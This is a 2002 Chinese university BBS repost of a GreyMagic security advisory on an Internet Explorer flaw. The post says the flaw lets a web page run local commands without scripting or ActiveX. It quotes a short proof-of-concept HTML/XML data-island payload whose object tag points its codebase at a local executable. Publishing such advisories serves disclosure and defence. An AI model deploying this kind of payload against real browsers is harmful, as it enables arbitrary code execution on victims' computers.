荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: jjk (kernel), 信区: Security
标 题: IE漏洞最新动向 (转载)
发信站: 荔园晨风BBS站 (Sat Mar 2 22:32:55 2002), 转信
【 以下文字转载自 jjk 的信箱 】
【 原文由 jjksam@smth.org 所发表 】
发信人: prodigal (回头), 信区: Security
标 题: IE漏洞最新动向 (转载)
发信站: BBS 水木清华站 (Fri Mar 1 19:22:15 2002)
发信人: hellguard (小四★跨越封锁线⊙), 信区: Hacker
标 题: IE漏洞最新动向 (转载)
发信站: BBS 水木清华站 (Thu Feb 28 20:13:03 2002)
这次是真的不需要Script和Activex支持就可远程执行命令了
GreyMagic Software <security@GREYMAGIC.COM>
GreyMagic Security Advisory GM#001-IE
=====================================
by GreyMagic Software, Israel.
27 Feb 2002.
Topic: Executing arbitrary commands without Active Scripting or ActiveX.
<span datasrc="#grin" datafld="exploit" dataformatas="html"></span>
<xml id="grin">
<nothing>
<exploit>
<![CDATA[
<object classid="clsid:12345678" codebase="c:/windows/notepad.exe">
</object>
]]>
</exploit>
</nothing>
</xml>
xml对于IE6是内置的,不是调用ActiveX解释执行的
--
也许有一天,他再从海上蓬蓬的雨点中升起,
飞向西来,再形成一道江流,再冲倒两旁的石壁,
再来寻夹岸的桃花。然而,我不敢说来生,也不敢信来生......
※ 来源:·BBS 水木清华站 smth.org·[FROM: 210.76.98.69]
--
※ 转载:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.146]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店